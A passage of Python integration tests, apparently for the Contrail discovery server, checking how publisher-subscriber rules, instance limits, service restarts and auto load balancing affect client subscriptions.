self.logger.info("#### Sending a dummy client request with instance value 3 ##")
self.logger.info("### Client will subscribe to IfmapServer #####")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="IfmapServer",\
instances="3", min_instances="0",\
client_id=self.inputs.compute_names[0]+":TestClient",\
remote_addr= self.inputs.compute_control_ips[0],\
client_type= "TestClient")
sleep(2)
self.logger.debug("# Verifying the number of instances of publishers granted to the client #")
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"TestClient"), service="IfmapServer")
instances_allocated = len(client_subscribed_service_id)
service_IPs = []
for i in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_service_id[i])
service_IPs.append(service_endpoint[0][0])
self.logger.debug("# Number of instances of Publishers used by TestClient are %d" \
% (instances_allocated))
self.logger.debug("# IPs of those publishers are %s #" % service_IPs)
if instances_allocated==1 and service_IPs[0]==self.inputs.cfgm_control_ips[0]:
self.logger.info("# As expected, TestClient is subscribed to only 1 instance of\
IfmapServer even if it is requesting for 3 instances. This happened because of rule present #")
pass
else:
result = False
self.logger.error("# TestClient is subscribed to less/more than 1 instance of IfmapServer.#")
self.logger.error("#Something went wrong. Expectedly, rules are not working.#")
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("# Now deleting a rule to verify that after rule is deleted,\
instances requested are granted without any restriction #")
self.ds_obj.delete_and_verify_rule(self.inputs.cfgm_control_ips[0], \
'IfmapServer', self.inputs.compute_control_ips[0], 'TestClient')
except Exception as e:
self.logger.error(e)
result = False
self.logger.debug("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
try:
self.logger.info("#### Sending a dummy client request with instance value 3 ##")
self.logger.info("### Client will subscribe to IfmapServer #####")
self.ds_obj.subscribe_service_from_discovery(ds_ip, service="IfmapServer",\
instances="3", min_instances="0",\
client_id=self.inputs.compute_names[0]+":TestClient",\
remote_addr= self.inputs.compute_control_ips[0],\
client_type= "TestClient")
sleep(2)
self.logger.debug("# Verifying the number of instances of publishers granted to the client #")
ifmap_server_count = len(self.inputs.cfgm_control_ips)
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"TestClient"), service="IfmapServer")
instances_allocated = len(client_subscribed_service_id)
self.logger.debug("# The instances of publishers allocated to TestClient are %d #" \
% instances_allocated)
self.logger.debug("# The total number of publishers running of such types are %d #"\
% ifmap_server_count)
if ifmap_server_count == instances_allocated or (ifmap_server_count > 3 and instances_allocated == 3):
self.logger.info("# Instance field working as expected #")
else:
self.logger.error(" # Instance field not working as expected.#")
result = False
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_when_service_admin_down(self):
''' Validate that when publisher mentioned in rule is administratively
down, the subscriber mentioned in rule, do not subscribe to any
other publisher.
Also verify that when publisher comes up, the applicable instance
of that client get a subscription from that Publisher.
For testing purpose, i have use DNS-SERVER as publisher and
contrail-vrouter-agent as client.
Steps:
1. Create a rule using any Publisher and subscriber pair.
2. Make the Publisher mentioned in the rule as admin down.
3. Verify that as service is down, the subscriber will not get any
other instance of that service because rule still holds true.
4. Make the Publisher as admin UP.
5. Verify that as soon as Publisher is made admin UP, the subscriber
will get that instance of service.
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of DNS servers running in different subnets
Also, setup requirement of this test case is to have at least
2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("dns-server", min_instances=2, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
try:
self.logger.info("# Create a rule for control node Dns-Server ##")
self.logger.info("# Subscriber in rule as contrail-vrouter-agent#")
self.ds_obj.add_and_verify_rule(self.inputs.bgp_control_ips[0], 'dns-server',\
self.inputs.compute_control_ips[0], 'contrail-vrouter-agent:0')
self.logger.info("# Making the admin state of dsn-server as *down*# ")
self.ds_obj.update_service(ds_ip,service="dns-server",\
ip=self.inputs.bgp_control_ips[0],admin_state="down")
except Exception as e:
self.logger.error(e)
result = False
self.logger.debug("#### Waiting for 45 seconds so that TTL expiry for all subscriber happens ###")
sleep (45)
try:
self.logger.debug("# Verifying that as publisher is admin down,\
the mentioned subscriber in rule do not get any instance of Publisher #")
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"contrail-vrouter-agent:0"), service="dns-server")
instances_allocated = len(client_subscribed_service_id)
if instances_allocated==0:
self.logger.info("# \n As expected, contrail-vrouter-agent running on %s\n \
is not subscribed to any dns-server as the rule is restricting it to do\n \
that and publisher mentioned in rule is admin *down*. #" % self.inputs.compute_control_ips[0])
pass
else:
result = False
self.logger.error("# \n Even if rule is present and publisher in rule\n \
is admin *down*, some publisher got assigned to the subscriber\n \
contrail-vrouter-agent running on %s .#", self.inputs.compute_control_ips[0])
service_IPs = []
for i in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_service_id[i])
service_IPs.append(service_endpoint[0][0])
self.logger.warn("# The publisher assigned to the client are running at following IPs: %s ###"\
% service_IPs)
self.logger.info("# Making the admin state of dsn-server as *up*# ")
self.ds_obj.update_service(ds_ip,service="dns-server",\
ip=self.inputs.bgp_control_ips[0],admin_state="up")
self.logger.debug("\n #### Waiting for 5 seconds so that the client \n \
subscribe to the new subscriber as soon as it comes administratively up ###")
sleep(5)
self.logger.debug("\n # Verifying that as publisher is admin up,\n \
the mentioned subscriber in rule gets the same instance of Publisher \n \
as mentione din rule #")
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"contrail-vrouter-agent:0"), service="dns-server")
instances_allocated = len(client_subscribed_service_id)
service_IPs = []
for i in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_service_id[i])
service_IPs.append(service_endpoint[0][0])
if instances_allocated==1 and service_IPs[0]==self.inputs.bgp_control_ips[0]:
self.logger.info("\n # As expected, contrail-vrouter-agent running \n \
on %s is subscribed to single dns-server as the rule is \n \
restricting it to do that. #" % self.inputs.compute_control_ips[0])
pass
else:
result = False
self.logger.error("\n # Even if rule is present and publisher in rule\n \
is admin *up*, some different publishers or no publisher got \n \
assigned to the subscriber contrail-vrouter-agent running on %s .#"\
% self.inputs.compute_control_ips[0])
self.logger.error("# The publisher assigned to the client are running at following IPs: %s###" \
% service_IPs)
except Exception as e:
self.logger.error(e)
result = False
self.logger.info("# Now deleting the rule before starting new test case #")
self.ds_obj.delete_and_verify_rule(self.inputs.bgp_control_ips[0], 'dns-server',\
self.inputs.compute_control_ips[0], 'contrail-vrouter-agent:0')
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_multiple_rule_same_subscriber(self):
''' Validate that rule restrict the subscriber irrespective of number
of instances requested by the client.
Also verify that, if multiple rules are present for same client,
more instances of service gets allocated to that client.
For testing purpose, i have used XMPP-SERVER as publisher and
contrail-vrouter-agent as client.
Steps:
1. Create different rules with same subscriber values and different Publishers.
2. Verify if rule is working as expected or not
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of XMPP servers running in different subnets
Also, setup requirement of this test case is to have at least 2
publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("xmpp-server", min_instances=2, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
try:
self.logger.info("\n # Create a rule for xmpp-server running on\n \
control node and subscriber as contrail-vrouter-agent #")
self.ds_obj.add_and_verify_rule(self.inputs.bgp_control_ips[0],'xmpp-server',\
self.inputs.compute_control_ips[0], 'contrail-vrouter-agent:0')
except Exception as e:
self.logger.error(e)
result = False
self.logger.debug("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
try:
self.logger.debug("# Verifying that client is only subscribed to mentioned Publisher in the rule #")
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"contrail-vrouter-agent:0"), service="xmpp-server")
instances_allocated = len(client_subscribed_service_id)
service_IPs=[]
for i in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_service_id[i])
service_IPs.append(service_endpoint[0][0])
if instances_allocated==1 and service_IPs[0]==self.inputs.bgp_control_ips[0]:
self.logger.info("\n # Client contrail-vrouter-agent running on %s\n \
is subscribed to expected xmpp-server as the rule is restricting \n \
it to do that #" % self.inputs.compute_control_ips[0])
pass
else:
result = False
self.logger.error("\n # Even if rule is present, subscription\n \
not happening as expected for contrail-vrouter-agent running on %s#"\
% self.inputs.compute_control_ips[0])
self.logger.error("\n # The publisher assigned to the client are\n \
running at following IPs: %s ###" % service_IPs)
self.logger.error("\n # Expected was that client will subscribe only\n \
to xmpp-server running on %s node" % self.inputs.bgp_control_ips[0])
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("\n # Create another rule for xmpp-server running on\n \
control node and subscriber as contrail-vrouter-agent so that \n \
2nd instance of xmpp-server gets a Publisher #")
self.ds_obj.add_and_verify_rule(self.inputs.bgp_control_ips[1],'xmpp-server',\
self.inputs.compute_control_ips[0], 'contrail-vrouter-agent:0')
except Exception as e:
self.logger.error(e)
result = False
self.logger.debug("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
try:
self.logger.debug("\n # Verifying that 2nd instance of the client is\n \
subscribed to mentioned Publisher in the rule #")
client_subscribed_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"contrail-vrouter-agent:0"),service="xmpp-server")
instances_allocated = len(client_subscribed_service_id)
service_IPs=[]
for i in range (0,instances_allocated):
service_endpoint = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_service_id[i])
service_IPs.append(service_endpoint[0][0])
if instances_allocated==2 and service_IPs[0] in self.inputs.bgp_control_ips\
and service_IPs[1] in self.inputs.bgp_control_ips:
self.logger.info("\n # Client contrail-vrouter-agent running on %s\n \
is subscribed to expected xmpp-server as the rule is restricting\n \
it to do that #" % self.inputs.compute_control_ips[0])
pass
else:
result = False
self.logger.error("\n # Even if 2 rules are present, subscription\n \
not happening as expected for contrail-vrouter-agent running on %s#"\
% self.inputs.compute_control_ips[0])
self.logger.error("\n # The publisher assigned to the client are running\n \
at following IPs: %s ###" % service_IPs)
self.logger.error("\n # Expected was that client will subscribe to\n \
xmpp-server running on %s and %s node" \
% (self.inputs.bgp_control_ips[0],self.inputs.bgp_control_ips[1]))
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("# Now deleting the rule before starting new test case #")
self.ds_obj.delete_and_verify_rule(self.inputs.bgp_control_ips[0],\
'xmpp-server', self.inputs.compute_control_ips[0],'contrail-vrouter-agent:0')
self.ds_obj.delete_and_verify_rule(self.inputs.bgp_control_ips[1],\
'xmpp-server', self.inputs.compute_control_ips[0],'contrail-vrouter-agent:0')
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_rule_on_xmpp_do_not_impact_dns(self):
''' This test case is specifically written to test Bug ID "#1548771"
[Discovery-Rel3.0-Centos-1]: Applying rule on DNS-server affects the rule
entry already applied to XMPP server and vice versa.
(Tested for client type : vrouter-agent)
Steps:
1. Create 2 different rules with same subscriber as
"contrail-vrouter-agent" and using xmpp-server in rule
1 and dns-server in rule 2.
2. Verify that both the rules work independently without impacting each other.
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of XMPP and DNS servers running in different subnets
Also, setup requirement of this test case is to have at least 2 publishers
and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("xmpp-server", min_instances=2, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
try:
self.logger.info("\n # Create 2 rules for xmpp-server and dns-server\n \
running on control node and subscriber as contrail-vrouter-agent#")
self.ds_obj.add_and_verify_rule(self.inputs.bgp_control_ips[0],\
'xmpp-server', self.inputs.compute_control_ips[0],\
'contrail-vrouter-agent:0')
self.ds_obj.add_and_verify_rule(self.inputs.bgp_control_ips[0],\
'dns-server', self.inputs.compute_control_ips[0],\
'contrail-vrouter-agent:0')
except Exception as e:
self.logger.error(e)
result = False
self.logger.debug("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
try:
self.logger.debug("\n# Verifying that client is only subscribed to\n \
mentioned Publishers in the rule #")
client_subscribed_xmpp_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"contrail-vrouter-agent:0"), service="xmpp-server")
client_subscribed_dns_service_id = self.ds_obj.get_subscribed_service_id\
(ds_ip, client=(self.inputs.compute_control_ips[0],\
"contrail-vrouter-agent:0"), service="dns-server")
instances_allocated_xmpp = len(client_subscribed_xmpp_service_id)
instances_allocated_dns = len(client_subscribed_dns_service_id)
service_IPs_xmpp=[]
service_IPs_dns=[]
for i in range (0,instances_allocated_xmpp):
service_endpoint_xmpp = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_xmpp_service_id[i])
service_IPs_xmpp.append(service_endpoint_xmpp[0][0])
for i in range (0,instances_allocated_dns):
service_endpoint_dns = self.ds_obj.get_service_endpoint_by_service_id\
(ds_ip,client_subscribed_dns_service_id[i])
service_IPs_dns.append(service_endpoint_dns[0][0])
if instances_allocated_xmpp==1 and service_IPs_xmpp[0]==self.inputs.bgp_control_ips[0]:
self.logger.info("\n # Client contrail-vrouter-agent running on %s\n \
is subscribed to expected xmpp-server as the rule is restricting\n \
it to do that #" % self.inputs.compute_control_ips[0])
pass
else:
result = False
self.logger.error("\n # Even if rule is present, subscription not\n \
happening as expected for contrail-vrouter-agent running on %s .#" \
% self.inputs.compute_control_ips[0])
self.logger.debug("\n # The publisher assigned to the client are \n \
running at following IPs: %s ###" % service_IPs_xmpp)
self.logger.debug("\n # Expected was that client will subscribe only\n \
to xmpp-server running on %s node" % self.inputs.bgp_control_ips[0])
if instances_allocated_dns==1 and service_IPs_dns[0]==self.inputs.bgp_control_ips[0]:
self.logger.info("\n # Client contrail-vrouter-agent running on %s \n \
is subscribed to expected dns-server as the rule is restricting\n \
it to do that #" % self.inputs.compute_control_ips[0])
pass
else:
result = False
self.logger.error("\n# Even if rule is present, subscription not\n \
happening as expected for contrail-vrouter-agent running on %s .#" \
% self.inputs.compute_control_ips[0])
self.logger.debug("\n# The publisher assigned to the client are \n \
running at following IPs: %s ###" % service_IPs_xmpp)
self.logger.debug("\n# Expected was that client will subscribe only\n \
to dns-server running on %s node" % self.inputs.bgp_control_ips[0])
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("# Now deleting the rule before starting new test case #")
self.ds_obj.delete_and_verify_rule(self.inputs.bgp_control_ips[0],\
'xmpp-server', self.inputs.compute_control_ips[0],\
'contrail-vrouter-agent:0')
self.ds_obj.delete_and_verify_rule(self.inputs.bgp_control_ips[0],\
'dns-server', self.inputs.compute_control_ips[0],\
'contrail-vrouter-agent:0')
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
def test_rule_with_vrouter_agent_do_not_impact_other_subscriptions(self):
''' This test case is specifically written to test Bug ID "#1541321"
[Discovery_R3.0_ubuntu_2704] : Rule mentioning contrail-vrouter-agent
affects all the subscriptions of that client with all Publishers
irrespective of the publisher mentioned in the rule. This happens for
1/2 cycle of TTL and things recover after that.
Steps:
1. Create a rule and mention subscriber as "contrail-vrouter-agent"
and using dns-server as publisher.
2. Verify that the configured rule do not impact subscription of
"contrail-vrouter-agent" to xmpp-server even for one TTL cycle .
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of XMPP servers running in different subnets
Also, setup requirement of this test case is to have at least
2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("xmpp-server", min_instances=2, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
try:
self.logger.info("\n # Find the instances of subscription of \n \
contrail-vrouter-agent to the xmpp-server server #")
xmpp_vrouter_subscription_list = self.ds_obj.get_all_xmpp_servers(ds_ip)
self.logger.info("\n # Create a rule for dns-server running on \n \
control node and subscriber as contrail-vrouter-agent #")
compute_control_ip = self.inputs.compute_control_ips[0].split('.')
compute_control_ip[2:4] = '0','0'
compute_control_ip = ".".join(compute_control_ip) + "/16"
self.ds_obj.add_and_verify_rule(self.inputs.bgp_control_ips[0],\
'dns-server', compute_control_ip, 'contrail-vrouter-agent:0')
self.logger.debug("\n # Verify that subscription of vrouter-agent\n \
to xmpp-server is not impacted due to the above rule for 90 seconds #")
for i in range(1,60):
new_xmpp_vrouter_subscription_list=self.ds_obj.get_all_xmpp_servers(ds_ip)
sleep(1)
if xmpp_vrouter_subscription_list == new_xmpp_vrouter_subscription_list:
pass
else:
self.logger.warn("\n #### Some assignment change has happened\n \
for vrouter agent subscription to xmpp-server #####")
self.logger.warn("\n #### Earlier service IDs in use were %s\n \
and after waiting for %i seconds, the service ID has changed to %s #####"\
% (xmpp_vrouter_subscription_list,i,new_xmpp_vrouter_subscription_list))
result = False
break
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("# Now deleting the rule before starting new test case #")
self.ds_obj.delete_and_verify_rule(self.inputs.bgp_control_ips[0],\
'dns-server', compute_control_ip, 'contrail-vrouter-agent:0')
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_discovery_server_restart_rule_present(self):
''' Validate that rules are followed even after discovery server restarts.
Steps:
1. Create rule for any Publisher and subscriber pair and verify
that rule is behaving properly.
2. Restart the discovery server on all config nodes.
3. Verify that after discovery server comes up again, rules are
still followed.
Precondition: Assumption is that setup is having a vrouter connected
to 2 instances of XMPP servers running in different subnets
Also, setup requirement of this test case is to have at least
2 publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("IfmapServer", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-control')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
if len(self.inputs.cfgm_control_ips) > 0:
self.logger.info("\n Creating rules corresponding to *IfmapServer*\n \
running on all Config nodes for *contrail-control* running in same subnets")
for i in range(0,len(self.inputs.cfgm_control_ips)):
cfgm_control_ip = self.inputs.cfgm_control_ips[i].split('.')
cfgm_control_ip[3] = '0'
cfgm_control_ip = ".".join(cfgm_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule(cfgm_control_ip,\
'IfmapServer', cfgm_control_ip, 'contrail-control')
if rule_status == False:
result = False
self.logger.debug("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
try:
self.logger.debug("#### Verifying clients subscribed to publishers ###")
for i in range(0,len(self.inputs.cfgm_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-control',\
self.inputs.cfgm_control_ips[i], 'IfmapServer')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
self.logger.debug("#### Stopping the discovery server process on all nodes ###")
for ip in self.inputs.cfgm_ips:
self.inputs.stop_service('contrail-discovery', [ip])
self.logger.debug("\n #### Waiting for 60 seconds so that all clients\n \
again try to resubscribe when discovery server is down ###")
sleep(60)
self.logger.debug("#### Starting the discovery server process on all nodes ###")
for ip in self.inputs.cfgm_ips:
self.inputs.start_service('contrail-discovery', [ip])
for ip in self.inputs.cfgm_ips:
client_status = self.inputs.confirm_service_active(\
'contrail-discovery',ip)
if client_status == False:
self.logger.error("Some issue happened after restart of discovery process")
result = False
assert result
self.logger.debug("\n #### Verifying clients subscribed to publishers\n \
as per rules, after discovery server restart ###")
for i in range(0,len(self.inputs.cfgm_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher(\
ds_ip, 'contrail-control',\
self.inputs.cfgm_control_ips[i],'IfmapServer')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("#### Stopping the discovery server process on all nodes ###")
for i in range(0,len(self.inputs.cfgm_control_ips)):
cfgm_control_ip = self.inputs.cfgm_control_ips[i].split('.')
cfgm_control_ip[3] = '0'
cfgm_control_ip = ".".join(cfgm_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule(cfgm_control_ip,\
'IfmapServer', cfgm_control_ip, 'contrail-control')
if rule_status == False:
result = False
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_publisher_restart_rule_present(self):
''' Validate that rules are followed even after Publisher servers restarts.
Steps:
1. Create multiple rules for Publisher and subscriber pairs and
verify that all rules are behaving properly.
2. Restart the Publishers mentioned in the rules on all the
corresponding nodes.
3. Verify that after Publisher service restart, rules are still followed.
Precondition: Assumption is that setup is having a contrail-control
connected to 2 instances of Ifmap servers running in different subnets
Also, setup requirement of this test case is to have at least 2
publishers and 2 subscribers.
Both set of publisher and subscriber should be in different network.
'''
self.ds_obj.skip_discovery_test("xmpp-server", min_instances=2, different_subnet_flag=True )
self.ds_obj.skip_discovery_test("Collector", min_instances=2, different_subnet_flag=True )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'contrail-vrouter-agent')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("\n Creating rules corresponding to *xmpp-server*,\n \
*dns-server* and *Collector* running on all control nodes for \n \
*contrail-vrouter-agent* running in same subnets")
for i in range(0,len(self.inputs.bgp_control_ips)):
bgp_control_ip = self.inputs.bgp_control_ips[i].split('.')
bgp_control_ip[3] = '0'
bgp_control_ip = ".".join(bgp_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule(bgp_control_ip, \
'xmpp-server', bgp_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
rule_status = self.ds_obj.add_and_verify_rule(bgp_control_ip, \
'dns-server', bgp_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
rule_status = self.ds_obj.add_and_verify_rule(collector_control_ip,\
'Collector', collector_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
self.logger.debug("#### Waiting for 30 seconds so that TTL expiry for all subscriber happens ###")
sleep (30)
try:
self.logger.debug("#### Verifying clients subscribed to publishers ###")
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0',\
self.inputs.compute_control_ips[i], 'xmpp-server')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0',\
self.inputs.compute_control_ips[i], 'dns-server')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0',\
self.inputs.compute_control_ips[i], 'Collector')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
self.logger.info("#### Restarting the xmpp, dns and Collector server process on all nodes ###")
for ip in self.inputs.collector_ips:
self.inputs.restart_service('contrail-collector', [ip])
for ip in self.inputs.bgp_ips:
self.inputs.restart_service('contrail-control', [ip])
self.inputs.restart_service('contrail-dns', [ip])
for ip in self.inputs.collector_ips:
client_status = self.inputs.confirm_service_active(\
'contrail-collector', ip)
if client_status == False:
self.logger.error("Some issue happened after restart of server process")
result = False
assert result
for ip in self.inputs.bgp_ips:
client_status = self.inputs.confirm_service_active(\
'contrail-control', ip)
if client_status == False:
self.logger.error("Some issue happened after restart of server process")
result = False
assert result
for ip in self.inputs.bgp_ips:
client_status = self.inputs.confirm_service_active(\
'contrail-dns', ip)
if client_status == False:
self.logger.error("Some issue happened after restart of server process")
result = False
assert result
self.logger.debug("\n #### Waiting for 30 seconds so that all clients\n \
again try to resubscribe when discovery server is down ###")
sleep(30)
self.logger.debug("\n #### Verifying clients subscribed to publishers\n \
should follow rules even after publisher process restart ###")
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0',\
self.inputs.compute_control_ips[i], 'xmpp-server')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0',\
self.inputs.compute_control_ips[i], 'dns-server')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
for i in range(0,len(self.inputs.compute_control_ips)):
verification = self.ds_obj.verify_client_subscription_to_expected_publisher\
(ds_ip, 'contrail-vrouter-agent:0',\
self.inputs.compute_control_ips[i], 'Collector')
if verification == False:
self.logger.error("Rule not behaving as expected")
result = False
except Exception as e:
self.logger.error(e)
result = False
try:
self.logger.info("#### Deleting the rules at end of test acse ###")
for i in range(0,len(self.inputs.bgp_control_ips)):
bgp_control_ip = self.inputs.bgp_control_ips[i].split('.')
bgp_control_ip[3] = '0'
bgp_control_ip = ".".join(bgp_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule( bgp_control_ip,\
'xmpp-server', bgp_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
rule_status = self.ds_obj.delete_and_verify_rule( bgp_control_ip,\
'dns-server', bgp_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
for i in range(0,len(self.inputs.collector_control_ips)):
collector_control_ip = self.inputs.collector_control_ips[i].split('.')
collector_control_ip[3] = '0'
collector_control_ip = ".".join(collector_control_ip) + "/24"
rule_status = self.ds_obj.delete_and_verify_rule(collector_control_ip,\
'Collector', collector_control_ip, 'contrail-vrouter-agent:0')
if rule_status == False:
result = False
except Exception as e:
self.logger.error(e)
result = False
assert result, "Test case failed due to some error. Please refer to logs"
@preposttest_wrapper
def test_auto_load_balance_Ifmap(self):
''' Validate that auto load balance works correctly for IfmapServer.
Steps:
1. Verify that normal load balancing is working correctly by
default on IfmapServer.
2. Set auto load balance as *True* and stop any one of the IfmapServers.
3. Verify that stopped Server loses all it's subscribers.
4. Again start the IfmapServer which was stopped earlier.
5. Verify auto load balancing takes place.
Precondition: Assumption is that setup is having at least 3 Ifmap Servers
'''
self.ds_obj.skip_discovery_test("IfmapServer", min_instances=3, different_subnet_flag=False )
result = True
ds_ip = self.inputs.cfgm_ip
assert self.ds_obj.resubscribe_with_new_ttl( 30, 30, 'supervisor-control')
self.addCleanup(self.ds_obj.modify_discovery_conf_file_params,"change_min_max_ttl")
self.logger.info("# Setting auto load balance to true in contrail-discovery.conf file #")
assert self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="IFMAPSERVER",policy='dynamic-load-balance')
try:
self.logger.debug("# Verifying that discovery server auto load balance for 'IfmapServer' #")
self.logger.info("# Stopping the IfmapServer on one of the config node until it looses all subscribers #")
self.inputs.stop_service('supervisor-config',\
host_ips=[self.inputs.cfgm_ips[0]])
self.logger.debug("# Waiting for 45 seconds to wait for server to lose all subscriptions #")
sleep(45)
count=self.ds_obj.get_service_in_use(ds_ip,(self.inputs.cfgm_control_ips[0],\
'IfmapServer'))
if count == 0:
pass
else:
self.logger.error("\n # Even if Server is not running, it still\n \
has %d *in use* subscription. Something is wrong #" % count)
self.inputs.start_service('supervisor-config',\
host_ips=[self.inputs.cfgm_ips[0]])
self.inputs.confirm_service_active(\
'supervisor-config',self.inputs.cfgm_ips[0])
self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="IFMAPSERVER",policy='load-balance')
result = False
assert result
self.logger.info("\n # Starting the IfmapServer on one of the config node\n \
expecting that subscriptions will happen again #")
self.inputs.start_service('supervisor-config',\
host_ips=[self.inputs.cfgm_ips[0]])
client_status = self.inputs.confirm_service_active(\
'supervisor-config',self.inputs.cfgm_ips[0])
if client_status == False:
self.logger.error("# Some issue happened after restart of config server #")
self.ds_obj.modify_discovery_conf_file_params( 'set_policy',\
publisher_type="IFMAPSERVER",policy='load-balance')
result = False
assert result
self.logger.debug("# Waiting for 30 seconds for restarted server to again get all subscriptions #")
sleep(30)
self.logger.debug("# Verifying that auto load balance worked properly or not after service restart #")
load_balance = self.ds_obj.check_load_balance(ds_ip, 'IfmapServer')
if load_balance == False:
